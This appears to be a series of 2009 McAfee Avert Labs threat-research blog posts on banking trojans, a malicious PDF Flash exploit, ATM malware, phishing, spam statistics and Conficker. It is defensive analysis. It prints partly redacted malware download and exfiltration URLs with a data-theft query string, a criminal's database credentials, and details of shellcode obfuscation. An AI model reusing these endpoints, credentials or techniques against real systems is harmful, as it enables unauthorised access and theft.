Our story starts with browser helper objects (BHOs), which are plug ins for Internet Explorer. BHOs give developers the opportunity to extend the browser’s functionality without their having access to the browser’s source code. That doesn’t sound too bad, as users aren’t forced to rely on the browser’s developers to implement new features. Even if you’re not a developer, it’s seems useful to download any desired extension, whether you want to customize the user interface or be able to read PDF documents directly in the browser, isn’t it? Well, yes and no! The answer depends on the trustworthiness of the BHO’s author, the server you download from, or the DNS server. Unfortunately, not all BHOs are safe applications—the bad guys are always looking for ways to turn originally useful features into a way to deploy their malware, hunting for usable information such as credentials. Silentbanker is one of those nasty password-stealing malware that comes in the form of a BHO.

This is one “helper” you don’t want on your side: Once installed and automatically loaded by the browser, Silentbanker can interrupt communication between your browser and the Internet! The malware is highly configurable and targets online banking users. Silentbanker will not only recognize and monitor online banking activity but may also modify HTML pages to include additional code or to change a transfer’s details. The data thief acts as a “man in the middle” to inspect and modify data before it is encrypted and sent to a server and after it is received from the server and decrypted. Still think you’re secure with SSL? Unfortunately that’s not the case with this freeloader sitting on top of the browser.

The screenshot above shows a pseudocode representation of Silentbanker’s malicious core. The code is responsible for detouring relevant operating system functions to its own malicious routines. This malware effectively kills security applications such as host intrusion prevention systems and others. Before its own malicious detours are installed, the malware disables any previously installed detours by reading a Windows library’s original code from the hard disk (“read_whole_file”), and then mapping it back to the process’ memory (“remove_API_hooks”)—thus rendering security products relying on the same technology ineffective.

Be sure to run McAfee VirusScan and Artemis, and McAfee Gateway Anti-Malware within your corporate network to protect your systems from password thieves.

We hear a lot about cybercrime events concerning Facebook or Myspace, but do you know ASmallWorld? It is a private international community for the jet-set crowd and culturally influential people.

Yesterday the French police force (OCLCTIC), accompanied by FBI agents, arrested two French residents. They were suspected of hacking this social-network platform dedicated to the worldwide upper crust. They allegedly attempted to extort US$1 million from the webmasters to not divulge stolen data.

Two years ago, a paper named “Asmallworld.net: we have hacked the smartest worldwide website” made some noise in France.

Whether you mingle with the jet set or in other circles, be careful when you share information on your favorite social network platform!

As reported by Adobe in July, a Flash vulnerability is being actively exploited by targeted attacks against Adobe Reader. Yes, embedding Flash movies in PDF documents is supported in Adobe Acrobat 9. The idea of allowing Flash movies to be displayed within PDFs isn’t bad if you like your documents spiced up with a bit of interactivity or training videos. From a security perspective, however, this poses yet another attack vector for criminals to take control of vulnerable systems. As history has shown, complexity and feature richness go hand in hand with remotely exploitable vulnerabilities. It is unfortunately no different with this latest PDF feature.

The exploitation of this vulnerability continues. Below are screenshots from one such malicious PDF document, discovered in a targeted attack this week. The attack contains several compressed streams and at least two embedded Flash movies. The first embedded Flash movie is clean, the second 6exploits CVE-ID 2009-1862, which causes a memory corruption and allows an attacker’s code to execute. Underneath the compression layer, JavaScript code is embedded in the PDF document. This code fills heap memory with the attacker’s shellcode. Apart from the PDF acting as an additional obfuscation layer around the exploit, the JavaScript code, once unpacked, contains another function that attempts to evade detection.

The FileInsight screenshot above shows the JavaScript function “lololo(),” which deobfuscates a string holding the actual malicious payload at run time. The function simply replaces any occurrence of the substring “XX” found in “payLoadCode” with the substring “%u,” converting the previously obfuscated string into one that can be “unescaped” to x86 shellcode. Its purpose is to prevent security products from detecting escaped strings that might be an indicator for an exploit. To find out about the payload’s final purpose, we load the final unescaped string into a disassembler:

This shellcode decodes a certain area found within the PDF document, using XOR operation and key 0xF4, writes every piece of decoded data to a file, and finally executes it by calling the WinExec() API function. The resulting file is a UPX-packed executable with an additional layer of a custom packer on top, complicating static analysis of the binary (proactively blocked as “BehavesLike.Win32.ModifiedUPX.J” by McAfee Gateway Anti-Malware). In order to analyze the executable, it first needs to be freed from its packer layers. What we see then is the executable’s ability to drop the DLL mscvr.dll to disk, with file attributes set to “hidden,” so it can’t be seen in Windows Explorer with default settings enabled. And before the malware injects this DLL into memory of the running explorer.exe process, it infects the network diagnostic utility netstat.exe on disk, so the utility will load msvcr.dll each time it runs. The DLL contains a configuration file embedded as a resource, telling the netstat utility to not display certain Chinese hostnames that the DLL is about to phone home to.

The DLL component is aware of several desktop security products. It attempts to terminate them before it collects private data–such as information about the operating system, CPU speed and type, the list of available drives, the logged-in user’s account name, and credentials for several programs (such as MSN Messenger). What is really bad about this piece of malware is its backdoor component. The sneaky code is capable of connecting to its creators, and waiting for instructions telling it what to do next. Next to common backdoor functionality like uploading, downloading, and moving files–which allow data theft and modification–the backdoor also contains a command to instruct the malware to spread to removable drives (as a worm does). This behavior can infect a corporate network, as we all know from the Conficker incident. McAfee Gateway Anti-Malware protects against this targeted attack, proactively blocking the malicious PDF document as “BehavesLike.PDF.CodeExec.EPEO.”

The recent onslaught of “Chinese pharmacy” spam and the DDoS attacks that took down Twitter, Facebook, and others have caused a frenzy of speculation about the Chinese government’s involvement in spam generation and acts of cyberterrorism. McAfee’s September 2009 Spam Report debunks these rumors and gets to the root of the cause.

The report reveals the truth behind the “Chinese pharmacy” spam:

• “Chinese pharmacy” spam appears to be the result of a need for regional pharmaceutical companies to offload excess drugs internationally, as selling excess drugs inside the country violates Chinese law. We just don’t believe this month’s onslaught is a sinister government plot.
• Spam originating from China can often make up between 60 percent and 65 percent of today’s global email volume
• “Chinese newsletter” spam emails were the leading type of pharmaceutical spam, with a total of 52,428 emails that contained 1,235 unique URL domains in a single day
• If excess drugs in China cannot be sold into the legal market due to Chinese law, then they will continue to be sold on the black market

Furthermore, the report uncovers findings that have surfaced since the August 6 DDoS attacks:

• The August 6 spam campaign, launched in conjunction with the DDoS attacks, was not solely responsible for the downfall of the social networking sites and, in fact, was likely a mere afterthought of the attacker
• The August 6 DDoS and spam attack was intended to target a pro-Georgian blogger, and was likely part of an intimidation campaign in retaliation for his political blogs
• Brazil, Turkey, and India were among the top three domains from which infected machines spread the August 6 spam campaign in conjunction with the DDoS attack

Check out the full report here.

Today we released our Q2 Threats Report. Some old trends have continued. Some new trends and threats have been established, and some old “friends” have even outdone themselves. Spam volumes have increased 141 percent since March, continuing the longest ever streak of increasing spam volumes. We also highlight the dramatic expansion of botnets and the threat from AutoRun malware.

More than 14 million computers have been enslaved by cybercriminal botnets, a 16 percent increase over last quarter’s rise. The report confirmed our first-quarter prediction that the surge in botnet growth would send spam levels to new heights, surpassing their previous peak in October 2008 before the takedown of the spam-hosting ISP McColo.

Our researchers also found that over the course of 30 days AutoRun malware had troubled more than 27 million files. AutoRun malware, which exploits Windows’ AutoRun capabilities, does not require any user clicks to activate, and is most often spread through portable USB and storage devices. The rate of detection surpasses even that of the infamous Conficker worm by 400 percent, making AutoRun one of the most prevalent pieces of malware in the world.

Some of the other areas we cover and discuss:

Cybercrime as a Service
As the number of botnets continues to grow, malware writers have begun to offer malicious software as a service to those who control these bots. By exchanging or selling resources, cybercriminals distribute new malware to wider audiences instantaneously. Programs like Zeus–an easy-to-use Trojan creation tool–continue to make the creation and management of malware even easier.

Cybercriminals Target Twitter, Social Networks
Twitter’s growth in popularity has made it a new target for cybercriminals in the last three months. Malware like the “Mikeey” worm and new variations of the Koobface Trojan attack users through tweets and abbreviated URLs. Spam Twitter accounts are becoming increasingly prevalent. Twitter administrative accounts have also been hacked on multiple occasions, giving cybercriminals access to the private accounts of celebrities and politicians, such as Britney Spears and Barack Obama and even allowing for the publication of sensitive internal strategy documents on the Web. Facebook and MySpace remain strong attack vectors for cybercriminals. In May, spam messages on social networks pointed users to more than 4,000 new Koobface binaries!

To view the McAfee Q2 Threats Report, go here.

I cribbed the title from Megadeth–I admit it. However, when looking at this year’s growth in malware it seems disturbingly appropriate. Global economic downturn or not, malware production continues at a record-setting pace because this is how many cybercriminals make their money. (Malware long ago stopped being about fun and bragging.)

We at Avert Labs have seen almost as much unique malware in the first half of 2009 as we did in ALL of 2008. This is quite something when you consider that in 2008 we saw the greatest ever growth in malware:

For you math and data junkies that comes out to an average of 200,000 unique pieces monthly or more than 6,000 daily. Yep–that was over 6,000 on a daily basis. Bear in mind these are malware we consider unique (something we had to write a driver for) and does not count all the other malware we detect generically or heuristically, but we will save that discussion for another post. When you add in the generic and heuristic detections the number becomes truly mind boggling.

Even when compared to the first half of 2008, the growth is almost three times what it was. The sheer growth is even challenging Moore’s Law a bit.

Our latest whitepaper, Financial Fraud and Internet Banking: Threats and Countermeasures, explains how much of this malware can be used to scam and steal from users. The new whitepaper was written by one of our French researchers, François Paget. It can be found here.

There are many reasons why malware continues to grow, but it is mainly a criminal’s game at this point. Malware steals data. The people who write and distribute malware are criminals. Pretty plain and simple to me. The tools and code are readily available and that will certainly not change, but (and this is important) it is also definitely NOT doomsday. Staying educated and updated goes a long way toward safe computing.

With the advent of Web 2.0, social networking websites have become an easy target for online fraud and other identity scams. Lately, we have seen Twitter being used to phish out personal information, as well as MySpace scams and Facebook spams.

With more than 15 percent of the traffic from India, Orkut is perhaps the most popular and widely used social networking website in the country. Phishers have come up with an elegant approach to social-engineer the not so tech-savvy users on Orkut. They have updated the user profiles of several thousands of compromised Orkut accounts, which now link to various phished websites. These lure visiting users into divulging their personal information.

Various phished websites claim to be the “adult” variant of Orkut. The “Orkut Sex” site has been very successful in luring several thousands of Orkut users into entering their credentials into this fake website. The attackers use the harvested details to steal other personal information for monetary gain.

We have observed scores of websites being used in this phishing attack. Here are a few of them:

• http://orkutsexlogi[blocked].tk
• http://s3x[blocked].kilu.de
• http://orkutst[blocked].tk
• http://album[blocked].kilu.de
• http://priya[blocked].freehostia.com

If you have read this far, I probably don’t need to remind you to look carefully before you enter your personal details on the web. Always make sure that you are safe and protected–and keep away from the rip-offs.

Recently, my colleague Pedro Bueno wrote about “dumb” malware authors hardcoding their login credentials into their password-stealing Trojan. The malware he referenced, PWS-Banker.gen.i, ostensibly came from Brazil. Today, we found the same negligence in a similar piece of Chinese malware detected as PWS-Banker.gen.de.

When run, the password-stealing Trojan queries for the infected host’s IP address using three web-based IP address-lookup services. It then makes a SQL query over TCP to post stolen passwords to a server in China. This is a part of the actual SQL query to log into the malicious SQL server:

Provider=SQLOLEDB.1;Password=168520564;Persist Security Info=True;User ID=mengmeng;[REMOVED]

mengmeng has been malicious, and what’s more, was careless to leave his login credentials in the open. Please keep your DATs updated to stay secure!

I don’t really know which is worse: a dumb or a smart malware writer.

Brazilian malware writers fall into the first category: bad coders and dumb. It’s as simple as that.

While checking a very recent PWS-Banker Trojan (the malware that steals banking information), I came across a variant. This one targets three Brazilian banks–Bradesco, Itau, and Real–to steal the basic information: bank account, branch office, user, password, and paper token info.

Next this malware sends the information to a remote SQL database. Nothing new to see here because password-stealing trojans have been around for several years, but what struck me in this case is that the malware author didn’t think about protecting the information he gathered (stole), since all the credentials to access the remote database are hardcoded inside the malware.

Provider=SQLOLEDB.1;Password=XXXXXX;Persist Security Info=True;User ID=YYYYY;Initial Catalog=YYYYY;Data Source=sql.[removed].com.br;Packet Size=10000

What does this mean? It was bad enough that someone gained access to the victims’ bank info, but now any person who checks the malware can also have access to that data! And by “checking” I do not mean it requires any reverse engineering.

Yes, it is just another password-stealing Trojan. No need to get too excited. And, yes, we already detect this malware–as PWS-Banker.gen.i.

We frequently encounter password stealers and backdoors in computers after their owners have browsed unsafe websites or opened unknown email attachments. It is more unusual, however, to see these malware directly implemented in banks’ automated teller machines. In these cases, Trojans have to be installed by people who have physical access to the machines. Data collecting and malware removal would need yet another visit or visits. It should seem obvious that such malware installation requires a high level of “cooperation” from the bank staff.

One of the first attacks occurred in Russia more than one year ago. It was announced in January 2009 when Diebold Inc. released a security fix for its Opteva Windows-based ATMs. At that time, the company said some suspects were apprehended. But it seems the gang was not fully dismantled. In May, we heard of new suspicious files discovered in Eastern European ATM machines. The security firm Trustwave published a study concerning this matter. The software had been updated and new virtual robberies had been launched. On June 3,  The Register also raised public awareness by covering the story. 

When active, the Trojan intercepts transactions and records them on log files. To control an infected ATM, the attacker uses dedicated credit cards that allow him to activate some administrative rules. Via the ATM’s display, he can select various options from the keypad to display statistics (numbers of transactions, cards, keys), print collected data, force the machine to dispense all its cash, uninstall the malware set, and reboot the ATM. Unfortunately, I was unable to test such malware in a real environment (I do not have a spare ATM lying around), but looking at the samples is very instructive. As in the previous attacks, the vulnerable ATMs are equipped with the Diebold Agilis 91x software, and the attacker can examine the registry to display version and statistics:

Targeted currencies are the U.S. dollar, Russian ruble (RUR), and the Ukrainian Hryvnia (UAH):

The attacker can also-–through a password-protected routine–control the currency-dispensing ATM cassette:

We are not aware of any such attacks outside Eastern Europe, but we encourage financial institutions to verify the integrity of their ATM systems. Be proactive!

The known versions of this malware are detected by McAfee VirusScan as PWS-BoldDie. Many generic and unclassified versions can be detected under the name Generic Backdoor!bw.

Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

Other areas the paper covers include:

• The shift in spam to mainly malicious web link usage

• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

• Use of malicious video banners placed in advertisement networks

• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

Download the paper in its entirety here.

Earlier today the nice folks at SANS blogged about a malware campaign dressed up as a digital-certificate update for Bank of America. The malicious link contained the substring “bankofamerica.com” and took you to a Web page rigged to mimic Bank of America’s Web page:

If you clicked on “Update Certificate,” a certifiably nasty piece of malware was served to you under the filename sophialite.exe.

Did you install this “certificate” by accident? Worry not. We have proactively detected this file as Spam-Mailbot.m since the 5631 DATs, released on May 30. Further, we have added detection for the file that it drops into C:\Windows\system32\sdra64.exe as PWS-Zbot and memory cleaning for the same as Spy-Agent.bw.gen!mem. This will make it to the DATs after Wednesday, June 3.

The takeaway from today’s social-engineering attack: If you receive suspicious email claiming to come from your bank, please do not follow the links in it! It’s advisable to visit banking-related websites using only your bookmarks. In the second step of today’s attack, cautious users may have picked up on the deception if they noticed that the sign “Secure Area” did not complement the nonsecure HTTP URL.

Psychologists would term the tricks employed above as abuses of the “exposure effect” and “anchoring.” For some background on these terms, have a peek at my article on the psychology of social engineering in the Fall 2008 edition of McAfee Security Journal. Happy reading .

Today we released our Spam Report for the month of June. In it we discuss two key findings:

President Obama’s First 100 Days of Spam
Although you might imagine the change of administration in the United States would have a major impact on the Internet, the first 100 days of Obama’s presidency were mostly business as usual in the spam world.

Identifying Spam Trends of the Future
Even though we’ve been told to avoid clicking such links to prevent spammers from learning who we are, many of us forget to be vigilant because the overall detection accuracy of anti-spam products has improved. Recipients may instantly distrust an executable attached to an email, but they often feel unthreatened by a short blurb and a URL.

What does the future of spam hold for us? Spam is all about making money and, as with most businesses, spammer CEOs need to worry about costs and their bottom lines. As long we continue to behave as suckers, spammers will use sophisticated tactics to separate us from our money. Download the full report here.

Today we launched a new web film series, entitled “H*Commerce: The Business of Hacking You.” The film series was created to expose cybercrime as a serious and universal threat that can no longer be ignored. Several of our own Avert Labs researchers lent a hand and their big ol’ brains to the project!

The term H*Commerce (or Hacker Commerce) is defined as the business of making money through the illegal use of technology to compromise personal and business data. Starting today, a new episode will be posted every two weeks here until all six episodes have aired.

The project was originally conceived as a series of standalone episodes, each focusing on different aspects of cybercrime: such as phishing, denial-of-service attacks, online scams, bank scraping, and fraudulent emails. As the filmmakers dug deep into the experience of H*Commerce victims, they realized the film’s focus had to be on the complex stories of real people doing normal online things, only to be horribly violated by ruthless cybercriminals.

Seth Gordon, director of films such as the 2008 theatrical release of “Four Christmases,” and the documentary “The King of Kong–A Fistful of Quarters,” was hired to direct “H*Commerce: The Business of Hacking You.” As Gordon began the research phase of the film, he identified an Oregon woman named Janella Spears, who was a victim of one of the largest and most elaborate email scams on record.

Spears’ story of losing more than $440,000, and the dire effects it had on her family and marriage, became the central theme of the film series. Over the course of the filming, Chris Roberts, a third-party cyberforensic expert, was introduced to Ms. Spears to provide advice on how to clean her system, handle the hackers, and help put an end to the cybercrime scams.

Watch, learn, and arm yourself with knowledge. Check it out at Stop H*Commerce.

The fight against cybercrime is showing some very promising progress over the last few years. We are certainly not where we want to be, but we’re on a good path. McAfee’s own Inititiative to Fight Cybercrime has been in force for more than a half-year. Recently our Cybercrime Response Unit was launched; it’s an online help center designed to assist victims (and people who suspect they may be victims) of cybercrime. But best of all: We are not alone!

McAfee has teamed with many other companies and institutions to form the Conficker Working Group and has set a precedent that raises hope for the future. Just this week I attended the Counter eCrime Operations Summit (CeCOS) in Barcelona, Spain. The event was hosted by the Anti-Phishing Working Group (APWG). This year’s meeting focused on the development of response paradigms and resources for managers and forensic professionals who fight ecrime. There were a number of very useful presentations and panels on user education, better interaction among various entities, and case studies on how successful this can be.

Even more important were the small meetings outside the offical program, connecting researchers from security companies, CERTs, and law enforcement agencies throughout the world with each other and talking over how we can improve the current situation. This has been a very productive week. At least I now have some hope for the future!

Today McAfee Avert Labs released its Threats Report for the first quarter of 2009. In it we reveal that cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008. The United States is now home to the largest percentage of botnet-infected computers, currently hosting 18 percent of all zombie machines. Seems the bad guys are attempting to recover from last November’s takedown of a central spam-hosting ISP by rebuilding their army.

Other Key Findings

The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone.

Servers hosting legitimate content have increased in popularity with malware writers as a means for distributing malicious and illegal content.

Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their locations.

Compared with the overall landscape, the Conficker worm represents a small subset of all threat reports. AutoRun malware, on the other hand, represented 10 percent of reported detections during the first quarter–quite a bit more than Conficker itself.

You can find the full text of the “McAfee Threats Report: First Quarter 2009″ here.

We have been getting quite a few requests for screenshots of swine flu spams as well as the e-pharmacy sites they link to. Your wish is our command. …

The image below is a collection of a bunch of swine flu spams:

You may notice several things here. First they are mainly text and links. Next, they use some good keywords: Obama, Gore, Madonna, Salma Hayek, and swine flu itself. Notice the linkage? They all seem to point to the .cn domain. Yes, .cn is China, but they are all redirects. When I looked at the Internic registry info it was a round-robin of Chinese and Russian domains and NS records.

Here is a screenshot of the e-pharmacy they all lead to:

You guessed it. It’s our old friend the “Canadian” e-pharmacy. Very clean and professional looking indeed; make sure you avoid these.

As we have pointed out for the last several days, these people are bottom feeders. My colleague Guilherme Venere quite clearly showed in his recent post that they are now linking directly to malware as well, so it is important to stay updated and educated.

Remember, if you need credible information on swine flu, go directly to the World Health Organization’s website. And if you need meds–maybe a ride to the doctor would be safer.

It’s been just a few days since we started talking about spam using Swine Flu as a way to catch user’s attention to sell pills. This time, however, the message is not very “healthy”:

The message above is in Portuguese, and goes like this: “For those who still don’t know, the pictures below show the Swine Flu terminal stage, the experts are trying to calm people down, but the pictures show that calm down is the only thing we shouldn’t do. See how the patient becomes in advanced stage”.

As we saw yesterday on David’s post, Brazil is the number one source of spam related to Swine Flu. In this case, the spammers use the name and logo of the biggest TV network in Brazil, Rede Globo, to catch user’s attention. But remember, this is a spam; they use this to make users believe that the news is true.

Links lead to two different malware files:

http://cch.[removed].dk/images/thumb/xxx/alerta.php?atencao=visualizar

=> Foto.29.04.2009.com

http://[removed].ru./uploaded/alerta.php?atencao=ver

=> Foto.29.04.2009.jpg.exe

They are identified as PWS-Banker-dldr and PWS-banker-gen.g

The file Foto.29.04.2009.com is a downloader which drop the URL below as C:\WINDOWS\temp\configura.exe

http://201.xx.xxx.xxx/manual/programs/ht/ht/zu/zu/abrir/Pcrazy.gif

And this file is identified as PWS-Banker-gen.b

This is a common banker malware which overlays a fake image over real the banking site. Here’s an example of a sequence telling the user his account will be suspended if he doesn’t update his information with the bank, then asking him to enter their personal information and even his credit card data: 

The information about the hacked machine and banking data are then posted to the sites below:

hxxp://[removed-1].100webspace.net/post.php

hxxp://[removed-2].100webspace.net/post.php

hxxp://[removed-3].100webspace.net/post.php

hxxp://[removed-4].100webspace.net/post.php

This is the strings appended to the URLs above:

tipo=inf&tip=[machinename]+[username]&inf=INFECTADO%0D%0A&

But one image inside this malware called our attention. The image below tries to disguise itself as the website for the Brazilian National Security Agency (SENASP), a site used by Brazilian law enforcement agents to research information about Brazilian citizens:

They attempt to steal usernames and passwords for this site. If the miscreants get access to this site they would be able to get information about any Brazilian citizen they want, even the president. Now tell me about identity theft!

As we can see an apparently innocent e-mail could cause your banking information to be stolen and even have more serious implications as the case above.

Following up on Chris Barton’s excellent blog the other day on swine flu spam, we wanted to take a closer look at the numbers…..

Many people may not realize that the words “swine” and “flu” had really not been seen in spam before this past weekend and almost certainly not together in the same subject line, so we kinda started there. Using our Trusted Source technology and intel I was able to pull the following chart on the sheer growth in the words “swine” and “flu” when used just as a subject for the last several days:

Bear in mind that is NOT daily volume growth but rather the growth in its use as a subject.

From the beginning of the campaigns we have seen it generated from all over the world, not really a surprise when one considers the global nature of botnets and spam anyway but the country breakdown is interesting to look at. Seems that Brazil, the United States and Germany are the biggest producers/sources at the moment:

No safe country from spammers eh? When you consider that on any given day there is between 80 to 170 billion email messages with 78 to 90 percent of that number being spam, sending with the subject of “swine flu” gives these criminals a high chance of success due to the media attention the subject is already getting. Social engineering is one of the most successful and dangerous tools at the spammers disposal and it is very hard to protect against.

We have also seen sites with the words “swine” and “flu” pushing malware as well. In this case its a redirect to a Russian-based site that requires our old friend the fake codec be installed to view the movie:

Malware writers, spammers and scammers are low lives. They will use any high media event or high impact news story to push their wares including the sickness and misery of others. Stay vigilant and stay safe. Should you need credible information on the influenza pandemic then go to The World Health Organization website.

Money laundering is a process for concealing the origin of funds generated by illegal means. People generally associate money laundering with drug trafficking, gun smuggling, or corruption. But funds misappropriated by identity theft, phishing, and carding also have to be “laundered.” Today, the mushrooming of virtual money (or e-currency) makes the job easier when you need to eliminate traces of suspicious actions. In the past, E-Gold and WebMoney were frequently under suspicion and had to respond to serious allegations of having been used to transform “dirty money” into “clean money.”

But they are not unique; ECUMoney, Liberty Reserve, PerfectMoney, Pecunix, etc. are also on the scene. As with all digital gold currencies, these exchangers offer nonreversible transactions, which is a primary advantage when you want to manipulate money.

Today, websites proposing virtual money exchanges are numerous on the Internet. They are profitable for their owners because they are subject to significant exchange commissions. It is also relatively safe for the people offering these services. In the past, malware authors explained they created their programs only for educational purposes and were not responsible for any inappropriate use. Today administrators of such websites are trying to claim they are not liable for the origin of the transmitting money.

Here too, the network is turning professional, and many former crooks are now specializing in this field. In October 2004, the U.S. Secret Service arrested people said to be responsible for a set of credit card and identity thefts that had plagued Internet users. It was the result of Operation Firewall. Most of them frequented ShadowCrew, a worldwide marketplace where thousands of members traded stolen credit cards and debit cards, as well as bank account numbers and counterfeit identification documents, such as drivers’ licenses, passports, and Social Security cards.

One convicted person, using Voleur (French for “thief”) as a pseudonym, set up a special payment system for cybercrime transactions. For a 10 percent commission, he exchanged cash for E-Gold, the well-known and controversial digital gold currency. Voleur laundered money for dozen of deals of forum members, moving amounts ranging from $40,000 to $100,000 per week. With about twenty other individuals, he pleaded guilty in November 2005, was sentenced in June 2006, and was released later on.

At that time, Voleur’s work was not institutionalized. But today, I believe, this individual is again in business and manages some websites specialized in giving advice for digital currency activities. One of them is named “Voleur Financial Services”; that’s a tall order!

On another site from the same origin (same administrators), we can see some examples of current fees:

Many people want to seize power in this fruitful business, and there are no holds barred. Enemies of Voleur often spread stories of him on the Internet and do not hesitate to reveal bank account numbers.

U.S. nationals are not alone in this business. At the time of Operation Firewall, an Eastern Europe married couple (he is Russian, she is Ukrainian),  their son, and several other people were arrested after they moved more than $35 million in suspect funds through their company, a pioneer of virtual money exchange. Their office was originally located in the Empire State Building, in New York City. Approximately $20 million flowed through E-Gold digital currency accounts.  It is also estimated they purchased approximately $15 million worth of Webmoney digital currency.

Now, from the Manhattan House of Detention, the main prisoner/offender keeps his blog, gives security advice, and is visited by compassionate countrymen.  Some of his friends (I suppose) still manage such exchange sites from Russia. From one of them, these screen shots show transfer fees and how easy it is to remain anonymous in the world of money transfers.

When you visit the website, you will discover a touching interview made in a U.S. jail and the (presumed) building housing the actual company: a bit empty, but nonetheless prestigious in the New York area.

In early April, at an annual conference of the Association of Russian Banks, Finance Minister Alexei Kudrin explained that many small banks are now “engaged in money laundering”. It seems that many suspicious online companies are also engaged in this business both in and outside of Russia.

RSA is pretty much over now and it has been a blurry several days. Some real good sessions, some real good panels. Lots of meetings and interviews and many old friends on hand (shoutouts to Dave Perry, Larry Bridwell, and Lysa Myers), but I digress. …

For me the best event was the “Hacking Exposed” session, by Stuart McClure and George Kurtz. OK, I cop to being biased because I know and work with both these gents/slackers at McAfee, but they did show a really wild hack–they pwned a primary domain controller from an iPhone! Yep, you read that correctly. They hacked a Windows server FROM an iPhone.

For those who were not among the annointed and attended, I have uploaded the slide deck here. Stu and George recorded the hack as well:

There has been a bit of chatter today about the first ever Mac-based botnet. This piece of malware actually appeared back in January of this year.

Quite frankly there is not any functionality in this “bot” (some would simply call it a remote access trojan but let’s not split hairs OK!!) that we have not seen before. The only thing of concern here is that it does affect the Mac platform which certainly is fresh territory.

As we had discussed in our previous blog, it is spread through pirated software at this point (a huge No, No anyway) so hopefully distribution will be light and not result in a large numbers. It definitely does highlight the need for security software regardless of platform!

Today McAfee has released The Carbon Footprint of Email Spam Report. The study looks at the global energy expended to create, store, view, and filter spam across 11 countries: Australia, Brazil, Canada, China, France, Germany, India, Mexico, Spain, the United States, and the United Kingdom. The report correlates the electricity spent on spam with its carbon footprint, because fossil fuels are by far the largest source of electricity in the world today. Since emissions cannot be isolated to one country, the study averages its findings to arrive at the global impact. Key findings include:

• The average greenhouse gas (GHG) emission associated with a single spam message is 0.3 grams of CO2. That’s like driving three feet (one meter); but when multiplied by the yearly volume of spam, that amount is equivalent to driving around the earth 1.6 million times.
• Much of the energy consumption associated with spam (nearly 80 percent) comes from users deleting spam and searching for legitimate email (false-positives). Spam filtering accounts for just 16 percent of spam-related energy use.
• Spam filtering saves 135 terawatt hours (TWh) of electricity per year. That is equivalent to taking 13 million cars off the road.
• If every inbox were protected by a state-of-the-art spam filter, organizations and individuals could reduce today’s spam energy by 75 percent or 25 TWh per year, the equivalent of taking 2.3 million cars off the road.
• Countries with greater Internet connectivity and more users, such as the United States and India, tend to have proportionately higher emissions per email user. The United States, for example, had emissions that were 38 times that of Spain.
• While Canada, China, Brazil, India, the United States and the United Kingdom showed similar energy use for spam by country, Australia, Germany, France, Mexico, and Spain came in about 10 percent lower. Spain had the lowest figure, with both the smallest amount of email that was received as spam and the smallest amount of energy use for spam per email user.

Not only is spam related to cybercrime and a nuisance, but it also impacts the environment. Download the study here. It’s worth a read.

So April 1st came and went, and it seemed that all might be right in the post-Conficker world…

Of course, nothing is that easy. With the latest activity, there is also a continual flood of information out there. Below, I have attempted to aggregate the new functionality.

Around April 7th/8th Conficker started to move again. Our peers were able to confirm this new update functionality.

When it did wake, it used the peer-to-peer (P2P) communication channel to call home rather than the HTTP rendez-vous to start its latest escapade. In this case, the infected host will be contacted initially by another host over an ad-hoc P2P connection. Kind of like an alarm clock. Then, after hitting the snooze button over a period of several hours, the communication begins again – starting this time from the infected host.

Conficker is definitely not in any rush to tango. Communication is done in such a manner that this traffic (aka update) may go unseen – or at least mostly under the radar, by using fragmented and irregular UDP communication.

So what happens next? When this P2P communication stream ends, our host is basically told to go to a domain and download a file. This is when TCP comes into play. Our infected host goes out to an address and an encrypted executable file is downloaded. Once executed, it could contain malware such as the ever-changing FakeAlert or even Waledac. So at the end of this round, we may be left looking at something similar to the below screenshots:

We have also seen some hosts serving up a Waledac payload.(Realistically, it may contain anything that the bad guys are serving up on those domains.)

These downloads are detected as FakeAlert-SpywareProtect and Waledac.gen.b respectively.

Also downloaded as part of the payload, we again have the MS08-067-like “hot” patch. This time however, it is closer to the original patch – so as to elude detection. (Note: our McAfee Conficker Detection tool is in process of being redesigned to allow detection of the latest variants).

There are also two other notes of interest. The first of which is that we have a new deadline to watch. On May 3rd this latest variant is set to expire.

Thinking aloud, this point brings some interesting questions to mind. Such as – Is this just a test from the Conficker crew who are serving up Waledac incidentally? Or is this done for other self-serving reasons? (i.e. – Attention diversion) Maybe it’s just a deadline for a rented botnet? Interesting questions I am sure the security community at large is wondering.

Second, when an infected host resolves a HTTP rendez-vous domain name, it compares the IP resolved with the list of IPs it already queried, if the new IP is in the list, it will move on to the next domain in its list.

Of course, we will update if anything else comes along…

Have you ever read an article on the web where you just had to Google a certain term or phrase to learn more about it, or even just to satisfy your own curiosity? The answer is likely yes, and it’s probably a frequent occurrence. That’s what malware distributers have figured out. Here’s an example. A news article about disgraced financier Bernard Madoff made mention of his 55-foot yacht; a 1969 Rybovich. Wow, I bet that’s a spectacular yacht. If you wonder what one looks like, perhaps you might do a quick search for “1969 Rybovich.” One may think such a casual search would be harmless. Think again. It turns out Malware distributors have honed in on the yacht phrase and the top Google results are malicious URLs. We first noticed this on the evening of April 1 when we first read the story and were curious – and our first take was “Wow, they are fast”.    We watched the evolution of the number of google results that presented malware over the course of April 2. The last we checked – even one of the blogs off of my.barackobama.com was utilizing this yacht to lure users.

The search results don’t look so threatening, but if you are to click on the first few URLs, you’ll find differently. Each of these URLs is a rouge anti-virus URL that will distribute malware. Here are a couple of examples…

These two examples should arouse suspicion by now, especially if you’re looking for yachts, but anyone acting in haste, or succumbing to further curiosity will be taken to the malware delivery upon clicking where prompted, and frequently it’s already been delivered even if you don’t click.

This example is quite typical of what you’ll see next when you click, a fake malware scan that delivers the malicious goods. It looks just like an MS scanner!!!

